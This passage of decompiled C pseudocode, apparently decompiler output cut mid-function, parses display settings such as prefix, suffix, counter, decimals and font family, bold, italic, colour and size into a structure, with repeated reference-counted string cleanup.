																																																																										_t1104 =  *(_t1856 + 4);
																																																																										__eflags = _t1104;
																																																																										if(_t1104 != 0) {
																																																																											E6E7E447C(_t1104);
																																																																											_t1922 = _t1922 + 4;
																																																																											 *(_t1856 + 4) = 0;
																																																																										}
																																																																										_push(0xc);
																																																																										E6E7E441B(_t1856);
																																																																										_t1922 = _t1922 + 8;
																																																																									}
																																																																								}
																																																																								_v24 = 4;
																																																																								_t1559 = __imp__#6;
																																																																								 *_t1559(_v52);
																																																																								_t1083 = _v40;
																																																																								_t1594 = _v100 + 1;
																																																																								_v100 = _t1594;
																																																																								__eflags = _t1594 - _v56;
																																																																								if(_t1594 < _v56) {
																																																																									continue;
																																																																								} else {
																																																																									goto L579;
																																																																								}
																																																																							}
																																																																						}
																																																																					}
																																																																				}
																																																																			}
																																																																		}
																																																																		goto L686;
																																																																	}
																																																																	goto L588;
																																																																}
																																																															}
																																																														}
																																																													}
																																																												}
																																																											} else {
																																																												_v20 = 0xe;
																																																												_t1160 = E6E7D82F0(_t1559,  &_v104, _t1794, __eflags, "prefix");
																																																												_t1662 =  &_v36;
																																																												_t1161 = E6E7D85E0(_t1662, _t1160);
																																																												_t1862 = _v104;
																																																												_t1570 = _t1161;
																																																												__eflags = _t1862;
																																																												if(_t1862 == 0) {
																																																													_t1823 = __imp__#6;
																																																												} else {
																																																													asm("lock xadd [esi+0x8], ecx");
																																																													__eflags = (_t1662 | 0xffffffff) != 1;
																																																													if((_t1662 | 0xffffffff) != 1) {
																																																														L367:
																																																														_t1823 = __imp__#6;
																																																														_v104 = 0;
																																																													} else {
																																																														__eflags = _t1862;
																																																														if(_t1862 == 0) {
																																																															goto L367;
																																																														} else {
																																																															_t1273 =  *_t1862;
																																																															_t1823 = __imp__#6;
																																																															__eflags = _t1273;
																																																															if(_t1273 != 0) {
																																																																 *_t1823(_t1273);
																																																																 *_t1862 = 0;
																																																															}
																																																															_t1274 =  *(_t1862 + 4);
																																																															__eflags = _t1274;
																																																															if(_t1274 != 0) {
																																																																E6E7E447C(_t1274);
																																																																_t1921 = _t1921 + 4;
																																																																 *(_t1862 + 4) = 0;
																																																															}
																																																															_push(0xc);
																																																															E6E7E441B(_t1862);
																																																															_t1921 = _t1921 + 8;
																																																															_v104 = 0;
																																																														}
																																																													}
																																																												}
																																																												__eflags = _t1570;
																																																												if(__eflags == 0) {
																																																													_t1162 = E6E7D82F0(_t1570,  &_v112, _t1794, __eflags, "suffix");
																																																													_t1664 =  &_v36;
																																																													_t1163 = E6E7D85E0(_t1664, _t1162);
																																																													_t1863 = _v112;
																																																													_t1571 = _t1163;
																																																													__eflags = _t1863;
																																																													if(_t1863 != 0) {
																																																														asm("lock xadd [esi+0x8], ecx");
																																																														__eflags = (_t1664 | 0xffffffff) == 1;
																																																														if((_t1664 | 0xffffffff) == 1) {
																																																															__eflags = _t1863;
																																																															if(_t1863 != 0) {
																																																																_t1257 =  *_t1863;
																																																																__eflags = _t1257;
																																																																if(_t1257 != 0) {
																																																																	 *_t1823(_t1257);
																																																																	 *_t1863 = 0;
																																																																}
																																																																_t1258 =  *(_t1863 + 4);
																																																																__eflags = _t1258;
																																																																if(_t1258 != 0) {
																																																																	E6E7E447C(_t1258);
																																																																	_t1921 = _t1921 + 4;
																																																																	 *(_t1863 + 4) = 0;
																																																																}
																																																																_push(0xc);
																																																																E6E7E441B(_t1863);
																																																																_t1921 = _t1921 + 8;
																																																															}
																																																														}
																																																														_v112 = 0;
																																																													}
																																																													__eflags = _t1571;
																																																													if(__eflags == 0) {
																																																														_t1164 = E6E7D82F0(_t1571,  &_v120, _t1794, __eflags, "counter");
																																																														_t1666 =  &_v36;
																																																														_t1165 = E6E7D85E0(_t1666, _t1164);
																																																														_t1864 = _v120;
																																																														_t1572 = _t1165;
																																																														__eflags = _t1864;
																																																														if(_t1864 != 0) {
																																																															asm("lock xadd [esi+0x8], ecx");
																																																															__eflags = (_t1666 | 0xffffffff) == 1;
																																																															if((_t1666 | 0xffffffff) == 1) {
																																																																__eflags = _t1864;
																																																																if(_t1864 != 0) {
																																																																	_t1241 =  *_t1864;
																																																																	__eflags = _t1241;
																																																																	if(_t1241 != 0) {
																																																																		 *_t1823(_t1241);
																																																																		 *_t1864 = 0;
																																																																	}
																																																																	_t1242 =  *(_t1864 + 4);
																																																																	__eflags = _t1242;
																																																																	if(_t1242 != 0) {
																																																																		E6E7E447C(_t1242);
																																																																		_t1921 = _t1921 + 4;
																																																																		 *(_t1864 + 4) = 0;
																																																																	}
																																																																	_push(0xc);
																																																																	E6E7E441B(_t1864);
																																																																	_t1921 = _t1921 + 8;
																																																																}
																																																															}
																																																															_v120 = 0;
																																																														}
																																																														__eflags = _t1572;
																																																														if(__eflags == 0) {
																																																															_t1166 = E6E7D82F0(_t1572,  &_v128, _t1794, __eflags, "divide");
																																																															_t1668 =  &_v36;
																																																															_t1167 = E6E7D85E0(_t1668, _t1166);
																																																															_t1865 = _v128;
																																																															_t1573 = _t1167;
																																																															__eflags = _t1865;
																																																															if(_t1865 != 0) {
																																																																asm("lock xadd [esi+0x8], ecx");
																																																																__eflags = (_t1668 | 0xffffffff) == 1;
																																																																if((_t1668 | 0xffffffff) == 1) {
																																																																	__eflags = _t1865;
																																																																	if(_t1865 != 0) {
																																																																		_t1225 =  *_t1865;
																																																																		__eflags = _t1225;
																																																																		if(_t1225 != 0) {
																																																																			 *_t1823(_t1225);
																																																																			 *_t1865 = 0;
																																																																		}
																																																																		_t1226 =  *(_t1865 + 4);
																																																																		__eflags = _t1226;
																																																																		if(_t1226 != 0) {
																																																																			E6E7E447C(_t1226);
																																																																			_t1921 = _t1921 + 4;
																																																																			 *(_t1865 + 4) = 0;
																																																																		}
																																																																		_push(0xc);
																																																																		E6E7E441B(_t1865);
																																																																		_t1921 = _t1921 + 8;
																																																																	}
																																																																}
																																																																_v128 = 0;
																																																															}
																																																															__eflags = _t1573;
																																																															if(__eflags == 0) {
																																																																_t1168 = E6E7D82F0(_t1573,  &_v136, _t1794, __eflags, "decimals");
																																																																_t1670 =  &_v36;
																																																																_t1169 = E6E7D85E0(_t1670, _t1168);
																																																																_t1866 = _v136;
																																																																_t1574 = _t1169;
																																																																__eflags = _t1866;
																																																																if(_t1866 != 0) {
																																																																	asm("lock xadd [esi+0x8], ecx");
																																																																	__eflags = (_t1670 | 0xffffffff) == 1;
																																																																	if((_t1670 | 0xffffffff) == 1) {
																																																																		__eflags = _t1866;
																																																																		if(_t1866 != 0) {
																																																																			_t1208 =  *_t1866;
																																																																			__eflags = _t1208;
																																																																			if(_t1208 != 0) {
																																																																				 *_t1823(_t1208);
																																																																				 *_t1866 = 0;
																																																																			}
																																																																			_t1209 =  *(_t1866 + 4);
																																																																			__eflags = _t1209;
																																																																			if(_t1209 != 0) {
																																																																				E6E7E447C(_t1209);
																																																																				_t1921 = _t1921 + 4;
																																																																				 *(_t1866 + 4) = 0;
																																																																			}
																																																																			_push(0xc);
																																																																			E6E7E441B(_t1866);
																																																																			_t1921 = _t1921 + 8;
																																																																		}
																																																																	}
																																																																	_v136 = 0;
																																																																}
																																																																__eflags = _t1574;
																																																																if(__eflags == 0) {
																																																																	_t1170 = E6E7D82F0(_t1574,  &_v144, _t1794, __eflags, "characters");
																																																																	_t1672 =  &_v36;
																																																																	_t1171 = E6E7D85E0(_t1672, _t1170);
																																																																	_t1867 = _v144;
																																																																	_t1575 = _t1171;
																																																																	__eflags = _t1867;
																																																																	if(_t1867 != 0) {
																																																																		asm("lock xadd [esi+0x8], ecx");
																																																																		__eflags = (_t1672 | 0xffffffff) == 1;
																																																																		if((_t1672 | 0xffffffff) == 1) {
																																																																			__eflags = _t1867;
																																																																			if(_t1867 != 0) {
																																																																				_t1192 =  *_t1867;
																																																																				__eflags = _t1192;
																																																																				if(_t1192 != 0) {
																																																																					 *_t1823(_t1192);
																																																																					 *_t1867 = 0;
																																																																				}
																																																																				_t1193 =  *(_t1867 + 4);
																																																																				__eflags = _t1193;
																																																																				if(_t1193 != 0) {
																																																																					E6E7E447C(_t1193);
																																																																					_t1921 = _t1921 + 4;
																																																																					 *(_t1867 + 4) = 0;
																																																																				}
																																																																				_push(0xc);
																																																																				E6E7E441B(_t1867);
																																																																				_t1921 = _t1921 + 8;
																																																																			}
																																																																		}
																																																																		_v144 = 0;
																																																																	}
																																																																	__eflags = _t1575;
																																																																	if(_t1575 != 0) {
																																																																		_push( &_v72);
																																																																		_t1182 = E6E7D8730(_t1575,  &_v148, _t1794, _t1823, _t1867, _t1975);
																																																																		_v20 = 0x14;
																																																																		_t1184 = E6E7F50D9(_t1182, E6E7D85C0(_t1182));
																																																																		_t1921 = _t1921 + 4;
																																																																		_t1869 = _v148;
																																																																		 *(_v96 + 0x48) = _t1184;
																																																																		__eflags = _t1869;
																																																																		if(_t1869 != 0) {
																																																																			asm("lock xadd [esi+0x8], eax");
																																																																			__eflags = (_t1184 | 0xffffffff) == 1;
																																																																			if((_t1184 | 0xffffffff) == 1) {
																																																																				__eflags = _t1869;
																																																																				if(_t1869 != 0) {
																																																																					_t1187 =  *_t1869;
																																																																					__eflags = _t1187;
																																																																					if(_t1187 != 0) {
																																																																						 *_t1823(_t1187);
																																																																						 *_t1869 = 0;
																																																																					}
																																																																					_t1188 =  *(_t1869 + 4);
																																																																					__eflags = _t1188;
																																																																					if(_t1188 != 0) {
																																																																						E6E7E447C(_t1188);
																																																																						_t1921 = _t1921 + 4;
																																																																						 *(_t1869 + 4) = 0;
																																																																					}
																																																																					_push(0xc);
																																																																					E6E7E441B(_t1869);
																																																																					_t1921 = _t1921 + 8;
																																																																				}
																																																																			}
																																																																			_v148 = 0;
																																																																		}
																																																																	}
																																																																} else {
																																																																	_push( &_v72);
																																																																	_t1198 = E6E7D8730(_t1574,  &_v140, _t1794, _t1823, _t1866, _t1975);
																																																																	_v20 = 0x13;
																																																																	_t1200 = E6E7F50D9(_t1198, E6E7D85C0(_t1198));
																																																																	_t1921 = _t1921 + 4;
																																																																	_t1870 = _v140;
																																																																	 *(_v96 + 0x4c) = _t1200;
																																																																	__eflags = _t1870;
																																																																	if(_t1870 != 0) {
																																																																		asm("lock xadd [esi+0x8], eax");
																																																																		__eflags = (_t1200 | 0xffffffff) == 1;
																																																																		if((_t1200 | 0xffffffff) == 1) {
																																																																			__eflags = _t1870;
																																																																			if(_t1870 != 0) {
																																																																				_t1203 =  *_t1870;
																																																																				__eflags = _t1203;
																																																																				if(_t1203 != 0) {
																																																																					 *_t1823(_t1203);
																																																																					 *_t1870 = 0;
																																																																				}
																																																																				_t1204 =  *(_t1870 + 4);
																																																																				__eflags = _t1204;
																																																																				if(_t1204 != 0) {
																																																																					E6E7E447C(_t1204);
																																																																					_t1921 = _t1921 + 4;
																																																																					 *(_t1870 + 4) = 0;
																																																																				}
																																																																				_push(0xc);
																																																																				E6E7E441B(_t1870);
																																																																				_t1921 = _t1921 + 8;
																																																																			}
																																																																		}
																																																																		_v140 = 0;
																																																																	}
																																																																}
																																																															} else {
																																																																_push( &_v72);
																																																																_t1214 = E6E7D8730(_t1573,  &_v132, _t1794, _t1823, _t1865, _t1975);
																																																																_v20 = 0x12;
																																																																E6E7F5989(E6E7D85C0(_t1214));
																																																																_t1217 = _v96;
																																																																_t1921 = _t1921 + 4;
																																																																_t1871 = _v132;
																																																																 *((long long*)(_t1217 + 0x50)) = _t1975;
																																																																__eflags = _t1871;
																																																																if(_t1871 != 0) {
																																																																	asm("lock xadd [esi+0x8], eax");
																																																																	__eflags = (_t1217 | 0xffffffff) == 1;
																																																																	if((_t1217 | 0xffffffff) == 1) {
																																																																		__eflags = _t1871;
																																																																		if(_t1871 != 0) {
																																																																			_t1220 =  *_t1871;
																																																																			__eflags = _t1220;
																																																																			if(_t1220 != 0) {
																																																																				 *_t1823(_t1220);
																																																																				 *_t1871 = 0;
																																																																			}
																																																																			_t1221 =  *(_t1871 + 4);
																																																																			__eflags = _t1221;
																																																																			if(_t1221 != 0) {
																																																																				E6E7E447C(_t1221);
																																																																				_t1921 = _t1921 + 4;
																																																																				 *(_t1871 + 4) = 0;
																																																																			}
																																																																			_push(0xc);
																																																																			E6E7E441B(_t1871);
																																																																			_t1921 = _t1921 + 8;
																																																																		}
																																																																	}
																																																																	_v132 = 0;
																																																																}
																																																															}
																																																														} else {
																																																															_push( &_v72);
																																																															_t1231 = E6E7D8730(_t1572,  &_v124, _t1794, _t1823, _t1864, _t1975);
																																																															_v20 = 0x11;
																																																															_t1810 =  *_t1231;
																																																															__eflags = _t1810;
																																																															if(_t1810 == 0) {
																																																																_t1794 = 0;
																																																																__eflags = 0;
																																																															} else {
																																																																_t1794 =  *_t1810;
																																																															}
																																																															_t1689 = _t1794;
																																																															_t1872 = _t1689 + 2;
																																																															do {
																																																																_t1232 =  *_t1689;
																																																																_t1689 = _t1689 + 2;
																																																																__eflags = _t1232;
																																																															} while (_t1232 != 0);
																																																															_push(_t1689 - _t1872 >> 1);
																																																															_t1233 = E6E7DBC80(_t1572, _v96, _t1823, _t1872, _t1975, _t1794);
																																																															_t1873 = _v124;
																																																															__eflags = _t1873;
																																																															if(_t1873 != 0) {
																																																																asm("lock xadd [esi+0x8], eax");
																																																																__eflags = (_t1233 | 0xffffffff) == 1;
																																																																if((_t1233 | 0xffffffff) == 1) {
																																																																	__eflags = _t1873;
																																																																	if(_t1873 != 0) {
																																																																		_t1236 =  *_t1873;
																																																																		__eflags = _t1236;
																																																																		if(_t1236 != 0) {
																																																																			 *_t1823(_t1236);
																																																																			 *_t1873 = 0;
																																																																		}
																																																																		_t1237 =  *(_t1873 + 4);
																																																																		__eflags = _t1237;
																																																																		if(_t1237 != 0) {
																																																																			E6E7E447C(_t1237);
																																																																			_t1921 = _t1921 + 4;
																																																																			 *(_t1873 + 4) = 0;
																																																																		}
																																																																		_push(0xc);
																																																																		E6E7E441B(_t1873);
																																																																		_t1921 = _t1921 + 8;
																																																																	}
																																																																}
																																																																_v124 = 0;
																																																															}
																																																														}
																																																													} else {
																																																														_push( &_v72);
																																																														_t1247 = E6E7D8730(_t1571,  &_v116, _t1794, _t1823, _t1863, _t1975);
																																																														_v20 = 0x10;
																																																														_t1811 =  *_t1247;
																																																														__eflags = _t1811;
																																																														if(_t1811 == 0) {
																																																															_t1794 = 0;
																																																															__eflags = 0;
																																																														} else {
																																																															_t1794 =  *_t1811;
																																																														}
																																																														_t1696 = _t1794;
																																																														_t1874 = _t1696 + 2;
																																																														do {
																																																															_t1248 =  *_t1696;
																																																															_t1696 = _t1696 + 2;
																																																															__eflags = _t1248;
																																																														} while (_t1248 != 0);
																																																														_push(_t1696 - _t1874 >> 1);
																																																														_t1249 = E6E7DBC80(_t1571, _v96 + 0x30, _t1823, _t1874, _t1975, _t1794);
																																																														_t1875 = _v116;
																																																														__eflags = _t1875;
																																																														if(_t1875 != 0) {
																																																															asm("lock xadd [esi+0x8], eax");
																																																															__eflags = (_t1249 | 0xffffffff) == 1;
																																																															if((_t1249 | 0xffffffff) == 1) {
																																																																__eflags = _t1875;
																																																																if(_t1875 != 0) {
																																																																	_t1252 =  *_t1875;
																																																																	__eflags = _t1252;
																																																																	if(_t1252 != 0) {
																																																																		 *_t1823(_t1252);
																																																																		 *_t1875 = 0;
																																																																	}
																																																																	_t1253 =  *(_t1875 + 4);
																																																																	__eflags = _t1253;
																																																																	if(_t1253 != 0) {
																																																																		E6E7E447C(_t1253);
																																																																		_t1921 = _t1921 + 4;
																																																																		 *(_t1875 + 4) = 0;
																																																																	}
																																																																	_push(0xc);
																																																																	E6E7E441B(_t1875);
																																																																	_t1921 = _t1921 + 8;
																																																																}
																																																															}
																																																															_v116 = 0;
																																																														}
																																																													}
																																																												} else {
																																																													_push( &_v72);
																																																													_t1263 = E6E7D8730(_t1570,  &_v108, _t1794, _t1823, _t1862, _t1975);
																																																													_v20 = 0xf;
																																																													_t1812 =  *_t1263;
																																																													__eflags = _t1812;
																																																													if(_t1812 == 0) {
																																																														_t1794 = 0;
																																																														__eflags = 0;
																																																													} else {
																																																														_t1794 =  *_t1812;
																																																													}
																																																													_t1704 = _t1794;
																																																													_t1876 = _t1704 + 2;
																																																													do {
																																																														_t1264 =  *_t1704;
																																																														_t1704 = _t1704 + 2;
																																																														__eflags = _t1264;
																																																													} while (_t1264 != 0);
																																																													_push(_t1704 - _t1876 >> 1);
																																																													_t1265 = E6E7DBC80(_t1570, _v96 + 0x18, _t1823, _t1876, _t1975, _t1794);
																																																													_t1877 = _v108;
																																																													__eflags = _t1877;
																																																													if(_t1877 != 0) {
																																																														asm("lock xadd [esi+0x8], eax");
																																																														__eflags = (_t1265 | 0xffffffff) == 1;
																																																														if((_t1265 | 0xffffffff) == 1) {
																																																															__eflags = _t1877;
																																																															if(_t1877 != 0) {
																																																																_t1268 =  *_t1877;
																																																																__eflags = _t1268;
																																																																if(_t1268 != 0) {
																																																																	 *_t1823(_t1268);
																																																																	 *_t1877 = 0;
																																																																}
																																																																_t1269 =  *(_t1877 + 4);
																																																																__eflags = _t1269;
																																																																if(_t1269 != 0) {
																																																																	E6E7E447C(_t1269);
																																																																	_t1921 = _t1921 + 4;
																																																																	 *(_t1877 + 4) = 0;
																																																																}
																																																																_push(0xc);
																																																																E6E7E441B(_t1877);
																																																																_t1921 = _t1921 + 8;
																																																															}
																																																														}
																																																														_v108 = 0;
																																																													}
																																																												}
																																																												_t1172 =  &_v72;
																																																												__imp__#9(_t1172);
																																																												_t1868 = _v36;
																																																												__eflags = _t1868;
																																																												if(_t1868 != 0) {
																																																													asm("lock xadd [esi+0x8], eax");
																																																													__eflags = (_t1172 | 0xffffffff) == 1;
																																																													if((_t1172 | 0xffffffff) == 1) {
																																																														_t1176 =  *_t1868;
																																																														__eflags = _t1176;
																																																														if(_t1176 != 0) {
																																																															 *_t1823(_t1176);
																																																															 *_t1868 = 0;
																																																														}
																																																														_t1177 =  *(_t1868 + 4);
																																																														__eflags = _t1177;
																																																														if(_t1177 != 0) {
																																																															E6E7E447C(_t1177);
																																																															_t1921 = _t1921 + 4;
																																																															 *(_t1868 + 4) = 0;
																																																														}
																																																														_push(0xc);
																																																														E6E7E441B(_t1868);
																																																														_t1921 = _t1921 + 8;
																																																													}
																																																												}
																																																												_v20 = 4;
																																																												_t1559 = __imp__#6;
																																																												 *_t1559(_v48);
																																																												_t1148 = _v40;
																																																												_t1593 = _v100 + 1;
																																																												_v100 = _t1593;
																																																												__eflags = _t1593 - _v52;
																																																												if(_t1593 < _v52) {
																																																													continue;
																																																												} else {
																																																													goto L497;
																																																												}
																																																											}
																																																										}
																																																									}
																																																								}
																																																							}
																																																						}
																																																						goto L686;
																																																					}
																																																					goto L506;
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															} else {
																																																_t1283 = _t1794;
																																																goto L331;
																																															}
																																														}
																																													}
																																												} else {
																																													_v16 = 0xe;
																																													_t1348 = E6E7D82F0(_t1559,  &_v192,  &_v172, __eflags, "fontFamily");
																																													_t1727 =  &_v32;
																																													_t1349 = E6E7D85E0(_t1727, _t1348);
																																													_t1879 = _v192;
																																													_v173 = _t1349;
																																													__eflags = _t1879;
																																													if(_t1879 != 0) {
																																														asm("lock xadd [esi+0x8], ecx");
																																														__eflags = (_t1727 | 0xffffffff) == 1;
																																														if((_t1727 | 0xffffffff) == 1) {
																																															__eflags = _t1879;
																																															if(_t1879 != 0) {
																																																_t1448 =  *_t1879;
																																																__eflags = _t1448;
																																																if(_t1448 != 0) {
																																																	 *_t1559(_t1448);
																																																	 *_t1879 = 0;
																																																}
																																																_t1449 =  *(_t1879 + 4);
																																																__eflags = _t1449;
																																																if(_t1449 != 0) {
																																																	E6E7E447C(_t1449);
																																																	_t1919 = _t1919 + 4;
																																																	 *(_t1879 + 4) = 0;
																																																}
																																																_push(0xc);
																																																E6E7E441B(_t1879);
																																																_t1349 = _v173;
																																																_t1919 = _t1919 + 8;
																																															}
																																														}
																																														_v192 = 0;
																																													}
																																													__eflags = _t1349;
																																													if(__eflags == 0) {
																																														_t1350 = E6E7D82F0(_t1559,  &_v200, _t1793, __eflags, "fontBold");
																																														_t1729 =  &_v32;
																																														_t1351 = E6E7D85E0(_t1729, _t1350);
																																														_t1880 = _v200;
																																														_v173 = _t1351;
																																														__eflags = _t1880;
																																														if(_t1880 != 0) {
																																															asm("lock xadd [esi+0x8], ecx");
																																															__eflags = (_t1729 | 0xffffffff) == 1;
																																															if((_t1729 | 0xffffffff) == 1) {
																																																__eflags = _t1880;
																																																if(_t1880 != 0) {
																																																	_t1432 =  *_t1880;
																																																	__eflags = _t1432;
																																																	if(_t1432 != 0) {
																																																		 *_t1559(_t1432);
																																																		 *_t1880 = 0;
																																																	}
																																																	_t1433 =  *(_t1880 + 4);
																																																	__eflags = _t1433;
																																																	if(_t1433 != 0) {
																																																		E6E7E447C(_t1433);
																																																		_t1919 = _t1919 + 4;
																																																		 *(_t1880 + 4) = 0;
																																																	}
																																																	_push(0xc);
																																																	E6E7E441B(_t1880);
																																																	_t1351 = _v173;
																																																	_t1919 = _t1919 + 8;
																																																}
																																															}
																																															_v200 = 0;
																																														}
																																														__eflags = _t1351;
																																														if(__eflags == 0) {
																																															_t1352 = E6E7D82F0(_t1559,  &_v208, _t1793, __eflags, "fontItalic");
																																															_t1731 =  &_v32;
																																															_t1353 = E6E7D85E0(_t1731, _t1352);
																																															_t1881 = _v208;
																																															_v173 = _t1353;
																																															__eflags = _t1881;
																																															if(_t1881 != 0) {
																																																asm("lock xadd [esi+0x8], ecx");
																																																__eflags = (_t1731 | 0xffffffff) == 1;
																																																if((_t1731 | 0xffffffff) == 1) {
																																																	__eflags = _t1881;
																																																	if(_t1881 != 0) {
																																																		_t1414 =  *_t1881;
																																																		__eflags = _t1414;
																																																		if(_t1414 != 0) {
																																																			 *_t1559(_t1414);
																																																			 *_t1881 = 0;
																																																		}
																																																		_t1415 =  *(_t1881 + 4);
																																																		__eflags = _t1415;
																																																		if(_t1415 != 0) {
																																																			E6E7E447C(_t1415);
																																																			_t1919 = _t1919 + 4;
																																																			 *(_t1881 + 4) = 0;
																																																		}
																																																		_push(0xc);
																																																		E6E7E441B(_t1881);
																																																		_t1353 = _v173;
																																																		_t1919 = _t1919 + 8;
																																																	}
																																																}
																																																_v208 = 0;
																																															}
																																															__eflags = _t1353;
																																															if(__eflags == 0) {
																																																_t1354 = E6E7D82F0(_t1559,  &_v216, _t1793, __eflags, "fontColor");
																																																_t1733 =  &_v32;
																																																_t1355 = E6E7D85E0(_t1733, _t1354);
																																																_t1882 = _v216;
																																																_v173 = _t1355;
																																																__eflags = _t1882;
																																																if(_t1882 != 0) {
																																																	asm("lock xadd [esi+0x8], ecx");
																																																	__eflags = (_t1733 | 0xffffffff) == 1;
																																																	if((_t1733 | 0xffffffff) == 1) {
																																																		__eflags = _t1882;
																																																		if(_t1882 != 0) {
																																																			_t1396 =  *_t1882;
																																																			__eflags = _t1396;
																																																			if(_t1396 != 0) {
																																																				 *_t1559(_t1396);
																																																				 *_t1882 = 0;
																																																			}
																																																			_t1397 =  *(_t1882 + 4);
																																																			__eflags = _t1397;
																																																			if(_t1397 != 0) {
																																																				E6E7E447C(_t1397);
																																																				_t1919 = _t1919 + 4;
																																																				 *(_t1882 + 4) = 0;
																																																			}
																																																			_push(0xc);
																																																			E6E7E441B(_t1882);
																																																			_t1355 = _v173;
																																																			_t1919 = _t1919 + 8;
																																																		}
																																																	}
																																																	_v216 = 0;
																																																}
																																																__eflags = _t1355;
																																																if(__eflags == 0) {
																																																	_t1356 = E6E7D82F0(_t1559,  &_v224, _t1793, __eflags, "fontSize");
																																																	_t1735 =  &_v32;
																																																	_t1357 = E6E7D85E0(_t1735, _t1356);
																																																	_t1883 = _v224;
																																																	_v173 = _t1357;
																																																	__eflags = _t1883;
																																																	if(_t1883 != 0) {
																																																		asm("lock xadd [esi+0x8], ecx");
																																																		__eflags = (_t1735 | 0xffffffff) == 1;
																																																		if((_t1735 | 0xffffffff) == 1) {
																																																			__eflags = _t1883;
																																																			if(_t1883 != 0) {
																																																				_t1379 =  *_t1883;
																																																				__eflags = _t1379;
																																																				if(_t1379 != 0) {
																																																					 *_t1559(_t1379);
																																																					 *_t1883 = 0;
																																																				}
																																																				_t1380 =  *(_t1883 + 4);
																																																				__eflags = _t1380;
																																																				if(_t1380 != 0) {
																																																					E6E7E447C(_t1380);
																																																					_t1919 = _t1919 + 4;
																																																					 *(_t1883 + 4) = 0;
																																																				}
																																																				_push(0xc);
																																																				E6E7E441B(_t1883);
																																																				_t1357 = _v173;
																																																				_t1919 = _t1919 + 8;
																																																			}
																																																		}
																																																		_v224 = 0;
																																																	}
																																																	__eflags = _t1357;
																																																	if(_t1357 != 0) {
																																																		_push( &_v68);
																																																		_t1368 = E6E7D8730(_t1559,  &_v228, _t1793, _t1823, _t1883, _t1975);
																																																		_v16 = 0x10;
																																																		E6E7F5989(E6E7D85C0(_t1368));
																																																		_t1371 = _v184;
																																																		_t1919 = _t1919 + 4;
																																																		_t1884 = _v228;
																																																		 *((long long*)(_t1371 + 0x20)) = _t1975;
																																																		__eflags = _t1884;
																																																		if(_t1884 != 0) {
																																																			asm("lock xadd [esi+0x8], eax");
																																																			__eflags = (_t1371 | 0xffffffff) == 1;
																																																			if((_t1371 | 0xffffffff) == 1) {
																																																				__eflags = _t1884;
																																																				if(_t1884 != 0) {
																																																					_t1374 =  *_t1884;
																																																					__eflags = _t1374;
																																																					if(_t1374 != 0) {
																																																						 *_t1559(_t1374);
																																																						 *_t1884 = 0;
																																																					}
																																																					_t1375 =  *(_t1884 + 4);
																																																					__eflags = _t1375;
																																																					if(_t1375 != 0) {
																																																						E6E7E447C(_t1375);
																																																						_t1919 = _t1919 + 4;
																																																						 *(_t1884 + 4) = 0;
																																																					}
																																																					_push(0xc);
																																																					E6E7E441B(_t1884);
																																																					_t1919 = _t1919 + 8;
																																																				}
																																																			}
																																																			_v228 = 0;
																																																		}
																																																	}
																																																} else {
																																																	_push( &_v68);
																																																	_t1742 =  *(E6E7D8730(_t1559,  &_v220, _t1793, _t1823, _t1882, _t1975));
																																																	__eflags = _t1742;
																																																	if(_t1742 == 0) {
																																																		_t1743 = 0;
																																																		__eflags = 0;
																																																	} else {
																																																		_t1743 =  *_t1742;
																																																	}
																																																	_t1388 = E6E7D8180(_t1743, L"%lX", _v184 + 0x1c);
																																																	_t1885 = _v220;
																																																	_t1919 = _t1919 + 0xc;
																																																	__eflags = _t1885;
																																																	if(_t1885 != 0) {
																																																		asm("lock xadd [esi+0x8], eax");
																																																		__eflags = (_t1388 | 0xffffffff) == 1;
																																																		if((_t1388 | 0xffffffff) == 1) {
																																																			__eflags = _t1885;
																																																			if(_t1885 != 0) {
																																																				_t1391 =  *_t1885;
																																																				__eflags = _t1391;
																																																				if(_t1391 != 0) {
																																																					 *_t1559(_t1391);
																																																					 *_t1885 = 0;
																																																				}
																																																				_t1392 =  *(_t1885 + 4);
																																																				__eflags = _t1392;
																																																				if(_t1392 != 0) {
																																																					E6E7E447C(_t1392);
																																																					_t1919 = _t1919 + 4;
																																																					 *(_t1885 + 4) = 0;
																																																				}
																																																				_push(0xc);
																																																				E6E7E441B(_t1885);
																																																				_t1919 = _t1919 + 8;
																																																			}
																																																		}
																																																		_v220 = 0;
																																																	}
																																																}
																																															} else {
																																																_push( &_v68);
																																																_t1403 =  *(E6E7D8730(_t1559,  &_v212, _t1793, _t1823, _t1881, _t1975));
																																																__eflags = _t1403;
																																																if(_t1403 == 0) {
																																																	_t1404 = 0;
																																																	__eflags = 0;
																																																} else {
																																																	_t1404 =  *_t1403;
																																																}
																																																_t1405 = E6E7F5103(_t1559, _t1823, _t1881, _t1404, L"true");
																																																_t1919 = _t1919 + 8;
																																																_t1886 = _v212;
																																																__eflags = _t1405;
																																																 *((char*)(_v184 + 0x19)) = _t1405 & 0xffffff00 | _t1405 == 0x00000000;
																																																__eflags = _t1886;
																																																if(_t1886 != 0) {
																																																	asm("lock xadd [esi+0x8], eax");
																																																	__eflags = 0xfffffffffffffffe;
																																																	if(0xfffffffffffffffe == 0) {
																																																		__eflags = _t1886;
																																																		if(_t1886 != 0) {
																																																			_t1409 =  *_t1886;
																																																			__eflags = _t1409;
																																																			if(_t1409 != 0) {
																																																				 *_t1559(_t1409);
																																																				 *_t1886 = 0;
																																																			}
																																																			_t1410 =  *(_t1886 + 4);
																																																			__eflags = _t1410;
																																																			if(_t1410 != 0) {
																																																				E6E7E447C(_t1410);
																																																				_t1919 = _t1919 + 4;
																																																				 *(_t1886 + 4) = 0;
																																																			}
																																																			_push(0xc);
																																																			E6E7E441B(_t1886);
																																																			_t1919 = _t1919 + 8;
																																																		}
																																																	}
																																																	_v212 = 0;
																																																}
																																															}
																																														} else {
																																															_push( &_v68);
																																															_t1421 =  *(E6E7D8730(_t1559,  &_v204, _t1793, _t1823, _t1880, _t1975));
																																															__eflags = _t1421;
																																															if(_t1421 == 0) {
																																																_t1422 = 0;
																																																__eflags = 0;
																																															} else {
																																																_t1422 =  *_t1421;
																																															}
																																															_t1423 = E6E7F5103(_t1559, _t1823, _t1880, _t1422, L"true");
																																															_t1919 = _t1919 + 8;
																																															_t1887 = _v204;
																																															__eflags = _t1423;
																																															 *((char*)(_v184 + 0x18)) = _t1423 & 0xffffff00 | _t1423 == 0x00000000;
																																															__eflags = _t1887;
																																															if(_t1887 != 0) {
																																																asm("lock xadd [esi+0x8], eax");
																																																__eflags = 0xfffffffffffffffe;
																																																if(0xfffffffffffffffe == 0) {
																																																	__eflags = _t1887;
																																																	if(_t1887 != 0) {
																																																		_t1427 =  *_t1887;
																																																		__eflags = _t1427;
																																																		if(_t1427 != 0) {
																																																			 *_t1559(_t1427);
																																																			 *_t1887 = 0;
